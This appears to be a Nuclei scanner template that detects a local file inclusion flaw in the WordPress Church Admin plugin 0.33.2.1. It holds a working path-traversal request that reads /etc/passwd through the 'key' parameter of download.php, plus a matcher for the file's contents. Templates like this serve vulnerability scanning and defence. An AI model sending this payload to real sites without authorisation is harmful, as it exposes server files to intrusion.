id: church-admin-lfi

info:
  name: WordPress Church Admin 0.33.2.1 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Church Admin 0.33.2.1 is vulnerable to local file inclusion via the "key" parameter of plugins/church-admin/display/download.php.
  reference:
    - https://wpscan.com/vulnerability/8997
    - https://id.wordpress.org/plugins/church-admin/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: wordpress,wp-plugin,lfi,wpscan

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/church-admin/display/download.php?key=../../../../../../../etc/passwd'

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/08/05
